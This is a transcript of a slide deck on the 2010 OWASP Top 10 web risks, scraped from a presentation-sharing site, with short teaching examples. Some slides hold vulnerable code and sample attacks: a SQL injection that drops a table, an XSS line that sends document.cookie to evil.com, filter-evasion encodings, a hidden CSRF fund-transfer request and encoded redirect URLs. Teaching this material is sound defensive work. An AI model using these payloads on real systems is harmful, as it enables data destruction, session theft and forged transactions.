1 / 19

OWASP top 10 - Agenda

OWASP top 10 - Agenda. Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources . The OWASP Guide. Warning . Risk analysis Insiders Architecture Modular Clarity SDLC Knowledge Predictability . Top 10 - 2010. Injection 

axl
Download Presentation

OWASP top 10 - Agenda

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources

  2. The OWASP Guide

  3. Warning • Risk analysis • Insiders • Architecture • Modular • Clarity • SDLC • Knowledge • Predictability

  4. Top 10 - 2010 • Injection  • Cross site scripting (XSS) • Broken authentication and session management  • Insecure direct object reference  • Cross site request forgery (CSRF)  • Security missconfiguration  • Insecure cryptograpic storage  • Failure to restrict URL access  • Insufficient transoport layer protection  • Unvalidated redirects and forwards

  5. A1 – Injection Client Appl DB Shell Pgm CPU

  6. A1 – Injection String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'"; id="foo" SELECT * FROM accnts WHERE ID='foo'; id="foo';DROP accnts;--" SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';

  7. A2 - Cross site scripting (XSS) Browser Appl DB Browser

  8. A2 - Cross site scripting (XSS) (String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>"; CC=“123456789" <input name='cc' value='123456789'> CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script> <input name='cc' value='123456789“><script> window.location=http://evil.com?x=document.cookie </script>'>

  9. A2 - Cross site scripting (XSS) <%3C&lt&lt;&LT&LT;&#60&#060&#60; &#x003c&#X3c&#x3C000003C;\x3c\x3C\u003c\u003C <img src=http://site.com onmoseover= <body onload= <IMG SRC=j&#X41vascript:alert('test2')>

  10. A3 - Broken authentication and session mngmnt • Unpredictable passwords, sessions-ID, security-questions • No sessions-id/credentials i URL • Avoid session-fixation • Time out of sessions & logout buttons • Different sessions id outside/inside TLS • No clear text passwords

  11. A4 - Insecure direct object references <SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION> </SELECT> period=2011q2 period=2011q3

  12. A5 - Cross-site request forgery (CSRF) <img src="http://example.com/transferFunds?amount=1500 &destinationAccount=attackersAcct#“width="0" height="0" /> <body onload="document.forms[0].submit()"> <form method="POST" action="https://bank.com/fn">    <input type="hidden" name="sp" value="8109"/> </form>

  13. A6 - Security missconfiguration • Patching • OS • Application • Frameworks / libraries • Disable unnecessary services • Stack traces • Configuration

  14. A7 - Insecure cryptographig storage • Keep track on sensitive data • Password one-way-hashed & salted • Password/Key management • TLS key pass phrase • M2M lösenord (obfuscation)

  15. A8 - Failure to restrict URL access /user/getAccounts /admin/getAccounts

  16. A9 - Insufficient transport layer protection • Use SSL/TLS • No mixed content • Use secure cookies • Example FireSheep exploits poor solutions

  17. A10 - Unvalidated redirects and forwards • http://www.vuln.com/redir.asp?=http://www.links.com • http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D

  18. OWASP resurser • OWASP Secure Software Contract Annex • OWASP Developer’s Guide • OWASP Enterprise Security API (ESAPI) • OWASP Software Assurance Maturity Model (SAMM) • OWASP WebGoat

More Related